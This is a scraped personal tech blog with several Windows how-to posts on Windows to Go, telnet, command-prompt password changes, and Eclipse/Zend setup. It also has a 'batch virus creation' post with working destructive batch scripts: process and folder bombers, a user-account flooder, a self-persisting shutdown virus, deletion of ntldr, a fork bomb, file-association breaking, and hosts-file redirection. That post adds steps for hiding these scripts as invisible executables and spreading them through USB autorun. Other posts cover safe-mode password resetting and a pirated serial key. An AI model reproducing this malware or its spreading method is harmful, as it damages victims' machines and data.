WINDOWS TO GO (WINDOWS 8 PRO)

Posted by MUKESH KUMAR on 11 Aug 2013




Windows to Go

Hey guys this is a tutorial on how to set up a Windows to Go (a live Windows 8 boot) USB using any version of Windows provided you have a copy of Windows 8.

Things you will need:
  • A USB or external HDD with 16GB of space (It is actually possible to do it onto an 8GB drive but depending on its actual formatted capacity you may have to remove a few drivers etc.)
  • A copy of a Windows 8 disc or ISO (Any version is fine including upgrade ones) you can grab a free 90 trial here
  • Less that 30 minutes of time depending on your hardware
Instructions:
  • Locate your Windows 8 disc or ISO and mount it
  • Navigate to \sources and copy the install.wim file to your desktop or other convenient location
  • Insert your USB or HDD and format the partition as NTFS with the default allocation
  • Download the free GImageX (http://www.softpedia...s/GImageX.shtml) and extract it
  • Run the x86 or x64 version depending on the version of Windows you are using
  • Navigate to the "Apply" tab
  • In the source section enter or browse for the location of the install.wim we copied earlier
  • In the destination section enter or browse for the location of the device you want to use for Windows to Go
  • Leave the checkboxes unchecked and hit apply
  • After imaging process is complete navigate to Disk Management (type in partition at search and you will find it)
  • Find the partition you are using for Windows to Go and right click it then -> "Mark partition as active" - this will allow us to boot from this partition, if its already active then don't worry about this step
  • Navigate to your Windows to Go disk and go to \Windows\System32
  • Open up CMD from this location (or change directory to the above folder) and enter
    bcdboot.exe X:\Windows /s X: /f ALL
    where "X" is your Windows To Go drive letter
  • Congratulations! Your Windows to Go device is now ready and all you will have to do is boot from the USB at startup then run through the one time configuration settings!
Tips:

  • Double check the drive letter when flashing the device because if you have other partitions then you will screw them up
  • Use a USB device with a high read/write rate because it will enhance disk IO performance on the machine you are running it on. USB 3.0 and or an SSD will greatly increase performance!
  • Copy a few installers to a folder on the USB for easy setup when you're up and running
  • Try not to unplug your Windows to Go device whilst the computer is still running because it may cause data corruption but if you do you will have 1 minute before it shuts down
  • You can use this method to quickly flash SSDs, HDDs, USBs and SDs with a custom image of Windows 8!
If you have any problem feel free to comment below and PM me!

Attached Images

More aboutWINDOWS TO GO (WINDOWS 8 PRO)

how to enable telnet in windows 7

Posted by MUKESH KUMAR on 4 Jul 2013

Telnet Client is used to connect to remote machine by using the Telnet protocol. For example, I'm an old fashion IT guy, and I still like to configure Cisco Switches/Routers using telnet. If you started to use Windows 7, you will notice that telnet is not enabled by default !! Don't panic, it is just a matter of few clicks and telnet will be enabled again.
Telnet Client allows a computer to connect to a remote Telnet server and run applications on that server. Once logged on, a user is given a command prompt that can be used as if it had been opened locally on the Telnet server's console. Commands that you type at the Telnet client command prompt are sent to the Telnet Server and executed there, as though you were locally logged on to a command prompt session at the server. Output from the commands that you run are sent back to the Telnet client where they are displayed for you to view.

When you first try to run a telnet command, Windows will informs you that telnet is not recognized as a command

To enable Telnet Client on Windows 7, follow these steps :
  1. Click on Start    then right click on Control Panel

  2. From Control Panel, click on Programs

  3. Under Programs and Features, click on Turn Windows Features on or off 
  4. From the Windows Features window, using the slider, scroll down till you reach Telnet Client, select the checkbox beside it, then click on OK



    The selected feature will be installed.



    Once it is installed, the Windows Features windows will be closed.
  5. To confirm that Telnet is installed, open command prompt and type telnet /?


Summary
By default, Telnet Client is not enabled in Windows 7. To enable it, you have to add the Telnet Client Windows Feature.

Another Method:
  • Open a command prompt window.
  • Click Start,type cmd in start search box, and then press Enter.
  • Type the following command
pkgmgr /iu:"TelnetClient"
  • If the User Account Control(UAC) dialog box appears, confirm that the action it displays is want you want, and then click continue.
  • When the command prompt appears again, the installation is complete

More abouthow to enable telnet in windows 7

batch virus creation

Posted by MUKESH KUMAR


What are Batch Files?Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat

Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file
So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.
What can batch viruses do ?They can be used to delete the windows files, format data, steal information, irritate victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy registry and for many more purposes.
Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).
Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating windows user accounts whose names could be any random numbers.
4.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

5. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.
6. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .
7. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a file type like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wouldn’t open properly.
8. DNS Poisoning

There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.
Viruses we just coded
Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.
To overcome these limitations,we need to convert these batch files into executable files that is exe files.
first download this Batch To Exe coverter with the help of goggling .
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.
You can use other options as per your requirement.
Spreading batch viruses through pen drive -:

Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
More aboutbatch virus creation

How to Adjust the Speed of My Local Area Connection

Posted by MUKESH KUMAR on 17 Feb 2013


  • 1
    Hold down the "Start" key and the "R" key on your keyboard to bring up the run dialogue box.
  • 2
    Type in "gpedit.msc"

  • 3
  • Browse to "Administrative Templates>Network>QoS Packet Scheduler."
  • 4
    Right click on "Limit Reservable Bandwidth" and click "Edit."
  • 5
    Type in a percent, such as "20 percent." For a 100mbit LAN, the computer will be limited to 20 percent of this, or 20mbits. Click "OK" and exit the Local Group Policy Editor.

  • More aboutHow to Adjust the Speed of My Local Area Connection

    TELNET

    Posted by Unknown on 5 Feb 2013


    platter:~ steve$ telnet gmail-smtp-in.l.google.com 25
    Trying 74.125.155.27...
    Connected to gmail-smtp-in.l.google.com.
    Escape character is '^]'.
    220 mx.google.com ESMTP y27si6889009wfi.2
    HELO platter.wordtothewise.com
    250 mx.google.com at your service
    MAIL FROM:<steve@blighty.com>
    250 2.1.0 OK y27si6889009wfi.2
    RCPT TO:<playingwithtelnet@gmail.com>
    250 2.1.5 OK y27si6889009wfi.2
    DATA
    354  Go ahead y27si6889009wfi.2
    From: <steve@blighty.com>
    To: <playingwithtelnet@gmail.com>
    Subject: Just a test email
    
    The body of the mail goes here.          
    .
    250 2.0.0 OK 1276638161 y27si6889009wfi.2
    QUIT
    221 2.0.0 closing connection y27si6889009wfi.2
    Connection closed by foreign host.
    More aboutTELNET

    TELNET

    Posted by Unknown


    platter:~ steve$ telnet gmail-smtp-in.l.google.com 25
    Trying 74.125.155.27...
    Connected to gmail-smtp-in.l.google.com.
    Escape character is '^]'.
    220 mx.google.com ESMTP y27si6889009wfi.2
    HELO platter.wordtothewise.com
    250 mx.google.com at your service
    MAIL FROM:<steve@blighty.com>
    250 2.1.0 OK y27si6889009wfi.2
    RCPT TO:<playingwithtelnet@gmail.com>
    250 2.1.5 OK y27si6889009wfi.2
    DATA
    354  Go ahead y27si6889009wfi.2
    From: <steve@blighty.com>
    To: <playingwithtelnet@gmail.com>
    Subject: Just a test email
    
    The body of the mail goes here.          
    .
    250 2.0.0 OK 1276638161 y27si6889009wfi.2
    QUIT
    221 2.0.0 closing connection y27si6889009wfi.2
    Connection closed by foreign host.
    More aboutTELNET

    How to Change a Computer Password Using Command Prompt

    Posted by MUKESH KUMAR on 31 Jan 2013


    Reboot the computer


    2Right after the bios is finished, hit F8 (or F2,F10,F12)

     
    3Select 'Safe mode' or 'Safe mode with networking support'

     
    4Windows will boot up to the logon screen. Click administrator, 9/10 there is no password.

     
    5Open Command Prompt. You can go to Start > Run and type cmd.exe or simply search for cmd using the Windows search function.


    6Type net user and press Enter. This will bring up a list of user accounts. Look here for the name and exact spelling of the account whose password you wish to change.


    7Type net user name goes here *. Do not neglect any of the spaces (particularly the one before the *) or the command won’t work.

     
    8Press Enter. Once submitted, the command will give you the option of typing a new password for the user.


    9Carefully type the desired password and press Enter. The characters will not display as you type, so make sure the Caps Lock isn’t on and be very thorough with the spelling and punctuation.

     
    10Retype the password to confirm. This should weed out any typos.

     
    11Press Enter. The new password should go into effect immediately. If you get an error message or your access is denied, the account you’re working on doesn’t have high enough authorization to change any passwords. See Tips for possible solutions.



    More aboutHow to Change a Computer Password Using Command Prompt

    How to Run a Program on Command Prompt

    Posted by MUKESH KUMAR





    This is something very easy, but requires just a little bit of knowledge. Anyone can do this. It is like clicking on that picture of firefox and watching it open up, except you tell your computer to open it 'the manual way'.
    EditSteps

    1You must first know what the program is called. Firefox would be "firefox.exe" and Internet Explorer would be "iexplore.exe". The best way to learn this is to open task manager, click on Processes, and look for the program. (note that you must run it first)


    2Next, open up Command Prompt. Vista and 7 users, click on start and search "Command Prompt", XP users click on Run and type in "cmd.exe" and click Run.


    3Set the command. It should always start with the command which is 'start', (a space) and the .exe you wish to open. For example, for Firefox users: "start firefox.exe".


    4Click enter, and the program that you told Command Prompt to open should open.





    More aboutHow to Run a Program on Command Prompt

    Starting project in Eclipse ( pdt ) With Zend Framework (PART-1)

    Posted by Unknown on 23 Jan 2013


    Introduction

    This tutorial describes how to deploy your first PHP application using Zend SDK deployment plugin for Eclipse IDE. It starts with setting up Eclipse to work with Zend deployment, then goes you though enabling project, editing and finally deploying an example application.

    Prerequisites

    An Eclipse IDE will be needed to further proceed. Any recent Eclipse version is a good choice, although to comfortably write PHP code you'll most likely need separate features, that are not included in Zend SDK deployment support.
    Minimum requirement:
    • Eclipse (3.6/3.7)
    Recommended, for PHP source code editing support:
    • Eclipse PDT (3.6/3.7)
    • Zend Studio (8.0/9.0)

    Installation

    Installation details are described in separate wiki document
    To install Zend SDK plugin in Eclipse, click Help > Install New Software... from main menu.
    In "Work with" field, enter the following URL:
    Select "Zend Application Deployment" and click "Finish". Installation will take a moment and ask you to restart Eclipse. After that, you're ready to go!
    Note! In order to speed-up the installation process, you may want to uncheck "Contact all update sites during the install to find required software".

    Create a project (for example Zend Framework)

    You can use an existing project, create new one using your favourite project wizard. Our example uses Zend Framework project wizard available in Zend Studio.
    • Click File > New > Zend Framework (in PDT select PHP Project)
    Click finish to create project.

    Add Application Deployment Support

    • Right click on the project
    • Select Configure > Add Application Deployment Support
    • The files deployment.xml and deployment.properties will be added to the project contents.
    • Application editor will show up to let you further customize your application.

    Modify the deployment descriptor

    • Let's modify some of the project properties, for example project name and version to make them better reflect the real project that we're working on. While editing form fields, the underlying XML files is constantly updated saving user from manipulating XML by hand.
    • Add dependency: Zend Framework
    Since our application depends on Zend Framework, we'll also specify this dependency in descriptor. This will save us in future, because before trying to install our app, the server will first check if necessary Zend Framework is available.
    Click "Add" and select "Zend Framework Version" dependency:
    Our application will have a password-protected admin panel. Usually, we'd have to manually configure the application by changing it's configuration files, or implementing some sort of pre-configuration mechanism. Zend Deployment mechanism simplifies this tedious action.
    We'll specify application parameters directly in deployment descriptor, and later during actual deployment, admin will fill in the parameters and our deployment scripts will pick them up and pre-configure the application.
    • Add user name parameter, click "Add Parameter" and fill-in as follows:
    Add password parameter, click "Add Parameter" and fill-in as follows:
    • Finally, we want to make use of parameters. During project deployment, we'll store the parameters provided by user in a configuration file, that later can be read by our admin panel.
    Application deployment is split into four phases: staging, activation, deactivation and unstaging. Staging and activation take place when installing application, while deactivation and ustaging take place during removal.
    Let's perform our configuration after the staging is done- in postStage callback. Double-click 'postStage' to create appropriate script. Since the file doesn't exist yet, you will be asked to create one.
    After pressing 'yes', you can specify the details:
    Now our package is done. Let's deploy it!

    Export a package

    • In the Overview tab, click on “Export as a package”
    • A wizard is displayed including the path to export to.
    • Click Finish
    • The package is ready!
    More aboutStarting project in Eclipse ( pdt ) With Zend Framework (PART-1)

    Total Video Converter 3.71 HD For Free Download + serial key

    Posted by Unknown on 26 Dec 2012



    Step 1
    Download Total Video Converter
    Step 2
    Install it on Your Computer
    Step 3
    Download Serial Key
    Password: xpeldrockers
    Step 4
    Enter Serial Key & Get Registered

    More aboutTotal Video Converter 3.71 HD For Free Download + serial key